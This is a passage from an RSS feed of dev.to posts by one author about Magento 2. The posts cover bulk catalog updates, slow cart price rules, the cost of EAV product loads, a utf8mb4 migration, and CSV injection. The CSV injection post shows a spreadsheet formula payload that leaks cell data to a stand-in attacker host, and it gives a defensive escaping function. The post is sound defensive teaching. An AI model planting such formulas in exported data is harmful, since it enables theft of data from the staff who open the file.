    &lt;span class="nv"&gt;$product&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productRepository&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'description'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$descriptions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productRepository&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;save&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every &lt;code&gt;save()&lt;/code&gt; runs the full product lifecycle: validation, every save-after observer and plugin, and a reindex trigger. At 50,000 products you've fired that machinery 50,000 times. The script runs for hours, the indexer thrashes, and admin grinds while it does.&lt;/p&gt;

&lt;p&gt;The product save path is built for a human editing one product in the admin. It is the wrong tool for touching the whole catalog.&lt;/p&gt;

&lt;h2&gt;
  
  
  Set shared values in bulk
&lt;/h2&gt;

&lt;p&gt;When you're writing the same value to many products (a marketplace flag, a country of manufacture, a default brand), Magento already ships the right tool:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Magento\Catalog\Model\Product\Action&lt;/span&gt;
&lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productAction&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;updateAttributes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nv"&gt;$batchOfIds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                       &lt;span class="c1"&gt;// 1-2k entity IDs per call&lt;/span&gt;
    &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'country_of_manufacture'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'IN'&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="nv"&gt;$storeId&lt;/span&gt;                           &lt;span class="c1"&gt;// 0 = default scope&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;updateAttributes()&lt;/code&gt; writes straight to the attribute's backend table for the whole batch and skips the full model save. One operation instead of N lifecycles. For genuinely distinct values per product, like unique descriptions, group your writes and keep them off the &lt;code&gt;productRepository-&amp;gt;save()&lt;/code&gt; path. The moment you're saving the full model in a loop, you've already lost.&lt;/p&gt;

&lt;h2&gt;
  
  
  Put the indexer on schedule before you start
&lt;/h2&gt;

&lt;p&gt;Switch your indexers to &lt;strong&gt;Update by Schedule&lt;/strong&gt; before any bulk run.&lt;/p&gt;

&lt;p&gt;On &lt;em&gt;Update on Save&lt;/em&gt;, every write reindexes synchronously and your enrichment job fights the indexer for the whole run. On schedule, writes drop into the changelog and mview reindexes only the changed rows on cron. You enrich fast, then reindex the delta once.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bin/magento indexer:set-mode schedule
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Translations live at store-view scope
&lt;/h2&gt;

&lt;p&gt;A translated description isn't a column on the product. It's an attribute value scoped to a store view. Write German to the German store view's id, not to the default scope. And don't clobber the default value with one language while you're at it.&lt;/p&gt;

&lt;p&gt;That &lt;code&gt;$storeId&lt;/code&gt; argument on &lt;code&gt;updateAttributes()&lt;/code&gt; is the same lever: pass the store-view id to set the localized value, and leave the global value alone.&lt;/p&gt;

&lt;h2&gt;
  
  
  The AI part, on a short leash
&lt;/h2&gt;

&lt;p&gt;An LLM will draft decent product copy across thousands of SKUs in one pass. It will also state, with total confidence, that a cable is 2 metres, a shirt is 100% cotton, and a case fits a phone it has never heard of.&lt;/p&gt;

&lt;p&gt;So treat generated copy as a draft, never as truth:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Generate into a staging field or a disabled scope, not straight onto the live product page.&lt;/li&gt;
&lt;li&gt;Sample-review a real slice before you trust the batch.&lt;/li&gt;
&lt;li&gt;Keep anything load-bearing (dimensions, materials, compatibility, claims) sourced and verified, not generated.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A wrong spec on a product page is a returns problem, and on regulated goods it's a bigger one than that.&lt;/p&gt;

&lt;h2&gt;
  
  
  An order of operations that survives 50k SKUs
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Indexers to &lt;strong&gt;scheduled&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Enrich into staging: a holding field or a disabled scope nobody can see yet.&lt;/li&gt;
&lt;li&gt;Bulk-apply in batches of 1-2k IDs, off the full save path.&lt;/li&gt;
&lt;li&gt;Reindex the delta, then smoke-test a real sample of product pages.&lt;/li&gt;
&lt;li&gt;Only then flip visibility.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The data sources are the easy 20%. The catalog is a live system with an indexer, a cache, and customers on it. Enrich it like one and 50,000 SKUs is a non-event. Loop over &lt;code&gt;save()&lt;/code&gt; and you'll find out how long an afternoon can be.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
    </item>
    <item>
      <title>Why Magento cart price rules get slow at checkout (and how to find the culprit)</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Wed, 24 Jun 2026 15:16:51 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/why-magento-cart-price-rules-get-slow-at-checkout-and-how-to-find-the-culprit-1dfd</link>
      <guid>https://dev.to/iamrobindhiman/why-magento-cart-price-rules-get-slow-at-checkout-and-how-to-find-the-culprit-1dfd</guid>
      <description>&lt;p&gt;I have watched a checkout get slower every time the marketing team shipped a new promotion. Not the product page. Not the cart. The totals step: the recalculation Magento runs after every add, remove, or quantity change. Each new cart price rule added a little more lag, and nobody connected the rules to the slowdown.&lt;/p&gt;

&lt;p&gt;Here is what's actually going on under the hood.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cart price rules run in PHP, on every recalculation
&lt;/h2&gt;

&lt;p&gt;A cart price rule is not a stored discount sitting in a column. It is a tree of conditions and a set of actions that Magento evaluates at runtime.&lt;/p&gt;

&lt;p&gt;Every time the quote changes, Magento recollects totals. Discount collection is one stage of that pass, handled by &lt;code&gt;Magento\SalesRule\Model\Quote\Discount&lt;/code&gt;. During it, Magento takes the rules that apply to the current cart and validates each rule's conditions against the quote items.&lt;/p&gt;

&lt;p&gt;That validation is PHP. A loop over rules, and inside it, condition checks against items held in memory. There is no single clever query that returns "the right discount." It is procedural evaluation, and it reruns on every recalculation of the cart.&lt;/p&gt;

&lt;p&gt;So the cost scales with two numbers: how many rules apply, and how expensive each rule is to check.&lt;/p&gt;

&lt;h2&gt;
  
  
  The pre-filter is doing more than you think
&lt;/h2&gt;

&lt;p&gt;Magento does not evaluate every row in &lt;code&gt;salesrule&lt;/code&gt;. The rule collection is narrowed first by website, customer group, coupon, and the current date before any conditions are checked. A rule scoped to one website and one customer group gets dropped early for everyone else.&lt;/p&gt;

&lt;p&gt;This is the cheapest performance win available, and most stores ignore it. Start by counting what is actually live:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;rule_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;from_date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sort_order&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;salesrule&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;is_active&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;to_date&lt;/span&gt; &lt;span class="k"&gt;IS&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;to_date&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;CURDATE&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;sort_order&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that returns 200 rows and your business runs maybe a dozen real promotions, you have 188 rules being filtered on every cart change for no reason. Expired campaigns that were never disabled. "Temporary" rules from two years ago. Each one is still work.&lt;/p&gt;

&lt;p&gt;Disable what you don't use. Scope what you keep as tightly as the campaign allows.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conditions are where the time goes
&lt;/h2&gt;

&lt;p&gt;Not all conditions cost the same.&lt;/p&gt;

&lt;p&gt;A condition on subtotal or quantity is cheap. The values are already on the quote. A condition that asks "does the cart contain a product in category X" is not. Category membership has to be resolved per item.&lt;/p&gt;

&lt;p&gt;Worse are conditions on product attributes. When a rule references a product attribute, Magento has to make that attribute available on the items during validation. It tracks which attributes rules care about in &lt;code&gt;salesrule_product_attribute&lt;/code&gt;, then loads them so the conditions can run. Reference a heavy or rarely-loaded attribute in a rule condition and you have added an attribute load to a hot path.&lt;/p&gt;

&lt;p&gt;The lesson: build conditions out of data the quote already has. Reach for category and attribute conditions only when a campaign genuinely needs them, and know you are paying for them on every recalculation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The table everyone forgets: salesrule_coupon
&lt;/h2&gt;

&lt;p&gt;Auto-generated coupon batches live in &lt;code&gt;salesrule_coupon&lt;/code&gt;. Generate a million codes for a campaign and the table holds a million rows. Lookups by code are indexed, so a single redemption stays fast, but the table itself grows without bound because expired campaigns rarely get cleaned up.&lt;/p&gt;

&lt;p&gt;Check its size. If it is large and most of the codes belong to dead campaigns, archive them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Finding the actual culprit
&lt;/h2&gt;

&lt;p&gt;Two ways, fastest first.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Binary-search the rules.&lt;/strong&gt; Disable half the active rules, reproduce the cart flow, measure. Narrow until one rule stands out. Crude, but it works in minutes and needs no tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Profile it.&lt;/strong&gt; Point Blackfire or Xdebug's profiler at a cart update and look at the time spent under the discount totals collector and the sales rule validator. The expensive rule shows up as the condition path that dominates.&lt;/p&gt;

&lt;p&gt;You are looking for one of two shapes: too many rules being validated, or one rule whose conditions are doing real work per item.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I would do, in order
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Count active rules. Disable the dead ones. This alone often fixes it.&lt;/li&gt;
&lt;li&gt;Tighten scope (website, customer group, dates) so the pre-filter throws rules out early.&lt;/li&gt;
&lt;li&gt;Audit conditions. Replace category and attribute conditions with cheaper ones wherever the campaign allows.&lt;/li&gt;
&lt;li&gt;Check &lt;code&gt;salesrule_coupon&lt;/code&gt; size and archive spent batches.&lt;/li&gt;
&lt;li&gt;Only then reach for the profiler, with a specific rule in your sights.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Promotions feel like a marketing concern until they show up in your checkout timings. They run on every cart change, in PHP, and they compound quietly. Treat the rule table like code: review it, delete what's dead, and keep the conditions cheap.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>performance</category>
      <category>php</category>
    </item>
    <item>
      <title>CSV injection: the export button that runs code on someone else's machine</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Tue, 23 Jun 2026 04:11:48 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6</link>
      <guid>https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6</guid>
      <description>&lt;p&gt;A customer fills in their name. They type &lt;code&gt;=HYPERLINK("http://evil.example/?leak="&amp;amp;A2,"click")&lt;/code&gt;. Your validation passes. It's just text, after all. Weeks later someone on your finance team exports the customer list to CSV, opens it in Excel, and that cell stops being text. It becomes a formula.&lt;/p&gt;

&lt;p&gt;That's CSV injection. Also called formula injection. It's one of the most common bugs in e-commerce admin panels, and almost nobody tests for it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why a string turns into a formula
&lt;/h2&gt;

&lt;p&gt;When a spreadsheet app opens a CSV, it doesn't treat every cell as plain text. If a cell starts with &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, or &lt;code&gt;@&lt;/code&gt;, Excel, LibreOffice, and Google Sheets all read it as the start of a formula.&lt;/p&gt;

&lt;p&gt;So a field holding &lt;code&gt;=1+1&lt;/code&gt; shows &lt;code&gt;2&lt;/code&gt;. Harmless. But formulas do more than arithmetic. They can build a URL out of other cells and nudge the user into clicking it. On some setups they can reach out to the network. Older Excel could even launch external commands through DDE if the user clicked past the warnings.&lt;/p&gt;

&lt;p&gt;The pattern is the same. Data your app stored as text becomes executable the moment a human opens the file. And the person who opens it is usually staff, the people with the most access.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where this hides in a store
&lt;/h2&gt;

&lt;p&gt;Anywhere you export user-controlled data:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Customer name and address exports&lt;/li&gt;
&lt;li&gt;Order grids exported to CSV&lt;/li&gt;
&lt;li&gt;Product feeds from third-party vendors&lt;/li&gt;
&lt;li&gt;Contact form and newsletter dumps&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The attacker never needs admin access. They set their own name, their company name, or a product title in a feed, then wait for someone on your side to export and open it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Sanitize on the way out, when you write the CSV. Not on the way in. Input validation is the wrong layer here, because the value is legitimate text right up until a spreadsheet reads it.&lt;/p&gt;

&lt;p&gt;If a cell value starts with &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, &lt;code&gt;@&lt;/code&gt;, a tab, or a carriage return, prefix it with a single quote:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;csvSafe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;in_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'='&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'+'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'-'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'@'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\t&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;"'"&lt;/span&gt; &lt;span class="mf"&gt;.&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The leading quote tells the spreadsheet "this is text," and the cell renders without it. Run every field through this before it reaches the file. That's the whole fix.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two things people get wrong
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Escaping in the database.&lt;/strong&gt; Don't. The value is fine in your database, fine in your HTML where you already encode output, and dangerous only in a CSV. Guard it at the CSV boundary so you don't mangle the data everywhere else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trusting your own exports.&lt;/strong&gt; The customer who set their name to a formula is attacking your staff, not your customers. "It's only an internal export" is exactly why it works.&lt;/p&gt;

&lt;p&gt;CSV injection has no scary scanner alert and no CVE filed against your app. It just sits in the export button you shipped two years ago. Go look at what writes your CSVs. If nothing guards the first character of each cell, you have it too.&lt;/p&gt;

</description>
      <category>websecurity</category>
      <category>php</category>
      <category>ecommerce</category>
    </item>
    <item>
      <title>The EAV tax: why Magento product loads are slow</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 22 Jun 2026 15:29:34 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/the-eav-tax-why-magento-product-loads-are-slow-117h</link>
      <guid>https://dev.to/iamrobindhiman/the-eav-tax-why-magento-product-loads-are-slow-117h</guid>
      <description>&lt;p&gt;Open a product in Magento 2 and ask your database what just happened. A single &lt;code&gt;addAttributeToSelect('*')&lt;/code&gt; load does not fire one query. It fires one per attribute backend type, plus the static columns, plus stock and media. The same flexibility that lets you add a product attribute from the admin with no schema migration is what makes a full product load expensive.&lt;/p&gt;

&lt;p&gt;That is the EAV tax. Most of the "Magento is slow" reports I get handed are paying it without knowing.&lt;/p&gt;

&lt;h2&gt;
  
  
  What EAV actually stores
&lt;/h2&gt;

&lt;p&gt;A product is not a row. It is a row in &lt;code&gt;catalog_product_entity&lt;/code&gt; for the static columns, and then its attribute values are scattered across typed value tables: &lt;code&gt;catalog_product_entity_varchar&lt;/code&gt;, &lt;code&gt;_int&lt;/code&gt;, &lt;code&gt;_decimal&lt;/code&gt;, &lt;code&gt;_text&lt;/code&gt;, &lt;code&gt;_datetime&lt;/code&gt;. Each value row is keyed by &lt;code&gt;entity_id&lt;/code&gt;, &lt;code&gt;attribute_id&lt;/code&gt;, and &lt;code&gt;store_id&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;To rebuild one product with all its attributes, Magento reads across every one of those tables and stitches the rows back into an object. Add a store view and the store-scoped values double the work.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;price&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;
&lt;span class="k"&gt;LEFT&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity_varchar&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;
  &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attribute_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;73&lt;/span&gt;
&lt;span class="k"&gt;LEFT&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity_decimal&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;
  &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attribute_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;77&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is two attributes. Now picture &lt;code&gt;*&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why &lt;code&gt;addAttributeToSelect('*')&lt;/code&gt; is the trap
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;*&lt;/code&gt; means every attribute in the set. On a category grid showing 36 products, the card needs maybe six fields: name, price, thumbnail, url key, status, visibility. With &lt;code&gt;*&lt;/code&gt; you loaded sixty. The other fifty-four were read, joined, hydrated, and thrown away before the page rendered.&lt;/p&gt;

&lt;p&gt;Name the columns you actually use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$collection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;addAttributeToSelect&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
    &lt;span class="s1"&gt;'name'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'price'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'small_image'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'url_key'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'status'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'visibility'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This one change is the single biggest win I see on slow listing pages. It costs nothing and it ships in five minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop rendering listings off the product collection
&lt;/h2&gt;

&lt;p&gt;The deeper fix is to not reassemble products from EAV on a listing at all. Category pages, layered navigation, and search should read from the index tables and OpenSearch, not loop a collection that re-hydrates every card from the value tables.&lt;/p&gt;

&lt;p&gt;Magento already maintains flattened index tables for this: &lt;code&gt;catalog_category_product_index&lt;/code&gt; for membership, the price index for prices, the fulltext index for search. A tuned category page leans on those and only touches EAV for the handful of attributes the card template prints. If your category controller is iterating a product collection with &lt;code&gt;*&lt;/code&gt;, that is the thing to pull apart first.&lt;/p&gt;

&lt;h2&gt;
  
  
  The flat catalog is not your escape hatch
&lt;/h2&gt;

&lt;p&gt;Older Magento answered EAV cost with the flat catalog: denormalize every attribute into one wide &lt;code&gt;catalog_product_flat&lt;/code&gt; table and read a single row. Adobe deprecated it, and for good reason. It falls over the moment you have thousands of attributes because MySQL caps columns per table, and it adds a heavy indexer you have to keep green. On a current build, do not turn it on.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I do instead
&lt;/h2&gt;

&lt;p&gt;Select named attributes, never &lt;code&gt;*&lt;/code&gt;, in any collection that renders to a user. Push listing and filtering to OpenSearch so the storefront reads an index instead of replaying joins. For bulk reads like exports and feeds, walk the catalog by &lt;code&gt;entity_id&lt;/code&gt; with keyset pagination and select only the fields you need, because a full &lt;code&gt;*&lt;/code&gt; load across a six-figure catalog will melt the box.&lt;/p&gt;

&lt;p&gt;Then measure. Turn on the query log and count statements per request. When a single category page fires several hundred queries, EAV reassembly is almost always the reason, and now you know exactly which line put them there.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
      <category>mysql</category>
    </item>
    <item>
      <title>Migrating a Magento 2 store from utf8 to utf8mb4 without losing data</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 22 Jun 2026 09:17:17 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/migrating-a-magento-2-store-from-utf8-to-utf8mb4-without-losing-data-khn</link>
      <guid>https://dev.to/iamrobindhiman/migrating-a-magento-2-store-from-utf8-to-utf8mb4-without-losing-data-khn</guid>
      <description>&lt;p&gt;A customer signed up with an emoji in their display name, and the row saved with everything after the emoji chopped off. No error in the log. The column was &lt;code&gt;utf8&lt;/code&gt;, and in MySQL &lt;code&gt;utf8&lt;/code&gt; has never been real UTF-8.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;utf8&lt;/code&gt; is a three-byte lie
&lt;/h2&gt;

&lt;p&gt;MySQL's &lt;code&gt;utf8&lt;/code&gt; is an alias for &lt;code&gt;utf8mb3&lt;/code&gt;: at most three bytes per character. It covers the Basic Multilingual Plane and stops there. Emoji, many CJK extension characters, and a pile of modern symbols are four bytes, and they do not fit.&lt;/p&gt;

&lt;p&gt;What happens when a four-byte character lands in a &lt;code&gt;utf8mb3&lt;/code&gt; column depends on your SQL mode. In strict mode you get &lt;code&gt;Incorrect string value: '\xF0\x9F...'&lt;/code&gt;. Without it, MySQL silently truncates the string at the offending byte and saves the rest. The second case is the dangerous one: no error, partial data, found weeks later in a support queue.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;utf8mb4&lt;/code&gt; is the fix. It is actual UTF-8, up to four bytes per character. New Magento installs use it. Plenty of stores set up years ago are still on &lt;code&gt;utf8mb3&lt;/code&gt; and inherit every one of these bugs.&lt;/p&gt;

